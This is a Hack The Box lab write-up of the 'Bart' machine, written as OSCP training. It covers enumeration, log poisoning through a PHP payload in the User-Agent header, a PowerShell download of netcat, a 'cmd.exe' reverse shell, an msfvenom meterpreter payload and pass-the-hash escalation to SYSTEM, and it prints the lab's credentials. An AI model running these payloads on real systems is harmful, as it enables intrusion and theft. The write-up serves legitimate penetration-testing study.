Hack the Box - Bart Write up



I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry if there are any quailty control mistakes in advance it’s too early for me.

Tools Used


Initial Scanning

Like with every hack the box machine lets begin with an nmap scan against Bart (

root@dastinia:~/htb/bart# nmap -sV -sC -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for
Host is up (0.18s latency).
Not shown: 999 filtered ports
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds

We see that the only available service is the IIS web service running on port 80. We can also determine from the IIS 10 http header that this is likely a windows server 2016 or windows 10 system running under the hood.

Enumeration Port 80 (forum.bart.htb (wordpress))

From our nmap scan we can that we are being redirected automatically to forum.bart.htb. Since htb doesn’t have global dns, we aren’t going to be able to resolve the site. We can add a dns entry in our /etc/hosts file to point to both bart.htb and forum.bart.htb. Reference

adding the /etc/hosts entry

root@dastinia:~/htb/bart# echo " forum.bart.htb" >> /etc/hosts
root@dastinia:~/htb/bart# echo " bart.htb" >> /etc/hosts

Visiting forum.bart.htb in a browser brings us to a snazzy SPA Wordpress site.

"Homepage of forum.bart.htb"

Attempting to access the Wordpress login page ends up with an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site. Likely is might be some sort of rabbit hole.

Running gobuster on forum.bart.htb doesn't reveal anything extremely interesting. Thinking that maybe there is some hidden content with the site, we mirror the site with wget, and search for interesting content like emails, extra domain names, or hidden pages.

We were able to discover a few potential emails/usernames but nothing that stood out blindly. We did notice that the bart developer Harvey Potter h.potter@bart.htb is the only member of the team not displayed on the main site, but who’s information is stored in a comment on the page.

mirroring site locally

root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/
forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css'  href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' />
forum.bart.htb/index.html:                                                      <h1 class="site-title"><a href="#" rel="home">BART</a></h1>
forum.bart.htb/index.html:                                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                              <div class="pos">Developer@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                                      <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li>

better grep or extract email addresses

root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"

Discovering Monitoring Portal with Wfuzz

Taking a step back, and attempting to enumerate the root of the domain – bart.htb with gobuster you discover that the site seems to be returning some kind of content on every request..

gobuster on bart.htb

root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   : http://bart.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)

Visiting the page in a browser you see that every page you attempt to go to returns the same error page. This technique is pretty common in modern web applications to return a page with the error instead of a standard 404 error message stating that something was wrong.

This will render tools like gobuster, dirb or dirbuster basically useless to gather information since the results will be filled with false positives or will require additional post process filtering to figure out what’s actually real.

"Error Page Returned"

To circumvent this we can use wfuzz as our directory brute forcer, and filter the results based on a character count baseline. As you can see below, the resulting error page wfuzz detects as having 158607 characters in the response. We can use this as our baseline and ignore all responses that have 158607 ch in them, which in turn would only show us pages that are different (unique content) with the --hh flag.

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.2.9 - The Web Fuzzer                         *

Target: http://bart.htb/FUZZ/
Total requests: 220560

ID      Response   Lines      Word         Chars          Payload

000001:  C=302      0 L        0 W            0 Ch        "# directory-list-2.3-medium.txt"
000002:  C=302      0 L        0 W            0 Ch        "#"
000009:  C=302      0 L        0 W            0 Ch        "# Suite 300, San Francisco, California, 94105, USA."
000003:  C=302      0 L        0 W            0 Ch        "# Copyright 2007 James Fisher"
000004:  C=302      0 L        0 W            0 Ch        "#"
000005:  C=302      0 L        0 W            0 Ch        "# This work is licensed under the Creative Commons"
000016:  C=200    630 L     3775 W        158607 Ch       "images"
000018:  C=200    630 L     3775 W        158607 Ch       "2006"
000017:  C=200    630 L     3775 W        158607 Ch       "download"
000026:  C=200    630 L     3775 W        158607 Ch       "about"
000021:  C=200    630 L     3775 W        158607 Ch       "serial"
000025:  C=200    630 L     3775 W        158607 Ch       "contact"
000027:  C=200    630 L     3775 W        158607 Ch       "search"
000028:  C=200    630 L     3775 W        158607 Ch       "spacer"
000022:  C=200    630 L     3775 W        158607 Ch       "warez"
000023:  C=200    630 L     3775 W        158607 Ch       "full"
000019:  C=200    630 L     3775 W        158607 Ch       "news"
000024:  C=200    630 L     3775 W        158607 Ch       "12"
000032:  C=200    630 L     3775 W        158607 Ch       "blog"
000029:  C=200    630 L     3775 W        158607 Ch       "privacy"
000034:  C=200    630 L     3775 W        158607 Ch       "10"
000073:  C=200    630 L     3775 W        158607 Ch       "category"
000031:  C=200    630 L     3775 W        158607 Ch       "logo"
000080:  C=200    630 L     3775 W        158607 Ch       "media"
000075:  C=200    630 L     3775 W        158607 Ch       "content"
000033:  C=200    630 L     3775 W        158607 Ch       "new"
000079:  C=200    630 L     3775 W        158607 Ch       "press"
000076:  C=200    630 L     3775 W        158607 Ch       "14"
000083:  C=200    630 L     3775 W        158607 Ch       "icons"
000081:  C=200    630 L     3775 W        158607 Ch       "templates"
000082:  C=200    630 L     3775 W        158607 Ch       "services"
000020:  C=200    630 L     3775 W        158607 Ch       "crack"
000030:  C=200    630 L     3775 W        158607 Ch       "11"
000035:  C=200    630 L     3775 W        158607 Ch       "cgi-bin"
000077:  C=200    630 L     3775 W        158607 Ch       "main"

Using Wfuzz to hide the error page responses

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.2.9 - The Web Fuzzer                         *

Target: http://bart.htb/FUZZ/
Total requests: 220560

ID      Response   Lines      Word         Chars          Payload

000014:  C=302      0 L        0 W            0 Ch        ""
000067:  C=200    548 L     2412 W        35529 Ch        "forum"
001614:  C=200     80 L      221 W         3423 Ch        "monitor"
002385:  C=200    548 L     2412 W        35529 Ch        "Forum"
019837:  C=200     80 L      221 W         3423 Ch        "Monitor"

From our results we can see that there’s content being served from the “forum” and “monitor” directories with the forum being forum.bart.htb


Visting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.

"Monitoring Application"

After trying the usual hack the box username:password combininations with no luck we begin looking for another avenue to get into this application. PHP monitor has a password reset function, which only takes a username. When you attempt to do a password reset on a user that doesn’t exist you get the following error.

"Forgot my password -- fail"

With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from forum.bart.htb.

I compiled a short list of possible user names from the site:

potential usernames compiled from forum.bart.htb

root@dastinia:~/htb/bart# cat names.txt

We can use burpsuite intruder coupled with the simple list payload to perform this attack.

"Burpsuite Simple List Payload"

This is how we can set up burpsuite intruder to perform our attack.

"Setting up burp suite intruder"

"Intruder Results"

From the results of our intruder attack we see that we have two valid usernames harvey and daniel.

After some educated guessing you will discover a valid username:password combination of harvey:potter.

When you attempt to authenticate you are redirected to monitor.bart.htb which fails to resolve similar to forums. We add monitor.bart.htb to our /etc/hosts file and attempt to reauthenticate with our newly found credentials.

root@dastinia:~# echo " monitor.bart.htb " >> /etc/hosts

After we re-authenticate we are greeted with the following page.

"Authenting to Server Monitor"

Browsing around you see there is an entry for the “Internal Chat” service

Viewing the details of “Internal Chat” reveals that there is another application on a different domain “internal-01.bart.htb”

"Discovering internal-01.bart.htb"


Simple Chat Source Code Discovery & Account Registration

Visting internal-01.bart.htb in our browser reveals the login page of bart’s internal “dev chat”.

"Dev chat internal login page"

while running gobuster & sqlmap in the background if you did some googling on “simple chat” you will discover the following github repo https://github.com/magkopian/php-ajax-simple-chat. To validate that these two applications are the same, I inspected the css/chat_global.css file and sure enough it was the same application. Looking at the application’s code we see that’s there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built so likely we can try manually crafting the request to register the account and hope nothing changed (we know the location and the parameters required to register an account from auditing the register.php source code).

Sure enough, we are able to register an account with a username:password of medic:medicmedic on the internal dev chat by crafting our request just right.

"Creating Account on Dev Chat"

"Authenticating to Internal Chat"

Getting RCE through LFI & Log Poisoning

Clicking the log link will cause two alerts to appear that seemly do nothing. Inspecting the original application code, there are no references to a “log” functionality so this must be a 3rd party modification. After some fiddling & inspecting the request history in burp suite, you will see that the application will record the username & your user-agent in a log file as seen below.

"Logged useragent"

Since we can control what our user agent is we can use this to execute php code by visiting the log file page.

GET //log/log.php?username=harvey&filename=log.php HTTP/1.1

Host: internal-01.bart.htb

User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9

Connection: close

Upgrade-Insecure-Requests: 1

"Code Execution Sucesss

To speed this up I recommend having 2-3 repeater tabs open. One to input commands into, and one to visit the page to trigger the execution.

We upload & execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.

I injected the following code into the user agent field. Make sure you remember to escape the \.

<?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('','nc.exe')\""); ?>
<?php exec("nc.exe 6667 -e cmd.exe"); ?>

getting shell

root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

 Volume in drive C has no label.
 Volume Serial Number is F84E-9CF7

 Directory of C:\inetpub\wwwroot\internal-01\log

12/07/2018  04:06    <DIR>          .
12/07/2018  04:06    <DIR>          ..
12/07/2018  04:00               101 log.ph
12/07/2018  04:05             2,643 log.php
12/07/2018  04:01               303 log.txt
21/02/2018  20:44    <DIR>          Microsoft
12/07/2018  04:06            59,392 nc.exe
               4 File(s)         62,439 bytes
               3 Dir(s)  15,505,301,504 bytes free

nt authority\iusr

Privilege Escalation

Poking around the system you will see that there’s not much going on. It’s a pretty recent build of windows, so that rules a lot of good chunk of kerel-based lpe exploits. Poking around the application folders you discover the password for the mysql database as seen below. You will realize that this was unhelpful information, after attempting to use this password against all the user accounts present on the box.

C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php
function db_connect() {
        $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
        if ($con === false) {
                return false;

        mysqli_set_charset ($con , 'UTF-8');
        return $con;

Getting x64 meterpreter shell & impacket

Lets generate a x64 bit meterpreter payload and make an smb share with impacket

generate payload msfvenom

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

impacket-smb share

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (,49813)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] User \BART authenticated successfully
[*] :::00::4141414141414141

setting up multihandler

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf exploit(multi/handler) > set ExitonSession False
ExitonSession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on

executting our payload from smb share & getting shell



msf exploit(multi/handler) >
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 1 opened ( -> at 2018-07-14 11:44:39 -0400

Active sessions

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART -> (

The meterpreter shell will die after some time, as well as the AV on the system will delete your shell after you execute it from the SMB share.

Recovering Administrator AutoLogon Credentials

At this point I did a good chunk of manual enumeration on the system. After manually performing the standard windows priviledge escapation tectures you discover that there are credentials stored in the autologon runkey. Here are a few resources I felt are pretty decent at explaining the things you should look for local windows privilege escalation. Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation

For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.

It did work with powershell running the following command: Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"

Since we are already using Metasploit for this box there is a Metasploit post exploitation module called windows_autologin which will extract any autologon credentials from the registry.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set SESSION 7
msf post(windows/gather/credentials/windows_autologin) > run

[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed

Getting System with PTH/PSEXEC

Now that we have the administrators credential getting system should be a snap.

We can perform a Pass the Hash Attack with metasploit’s various psexec modules. We need to add a route to the system so that the module can access the smb port 445 listening locally on the box. This can be achieved with metasploit’s route add command.

msf> use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass => 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\\\\kk\\\6969.exe
COMMAND => \\\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) > set RHOSTS
msf auxiliary(admin/smb/psexec_command) > options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   COMMAND               \\\kk\6969.exe        yes       The command you want to execute on the remote host
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT                 445                               yes       The Target port
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             .                                 no        The Windows domain to use for authentication
   SMBPass               3130438f31186fbaf962f407711faddb  no        The password for the specified username
   SMBSHARE              C$                                yes       The name of a writeable share on the server
   SMBUser               Administrator                     no        The username to authenticate as
   THREADS               1                                 yes       The number of concurrent threads
   WINPATH               WINDOWS                           yes       The name of the remote Windows directory
msf auxiliary(admin/smb/psexec_command) > route add 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) > run

[+]       - Service start timed out, OK if running a command or non-service executable...
[*]       - checking if the file is unlocked
[*]       - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-]       - Command seems to still be executing. Try increasing RETRY and DELAY
[*]       - Getting the command output...
[*]       - Command finished with no output
[*]       - Executing cleanup...
[+]       - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) >
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 8 opened ( -> at 2018-07-14 01:15:57 -0400

msf auxiliary(admin/smb/psexec_command) > sessions

Active sessions

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  7         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART -> (
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BART -> (

msf auxiliary(admin/smb/psexec_command) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > sysinfo
Computer        : BART
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That’s all for now. I’m pretty busy with oscp & work so hopefully the next few boxes are machines I already have writeups completed for. I’ll also update this post on how to complete this box without metasploit after I get some sleep.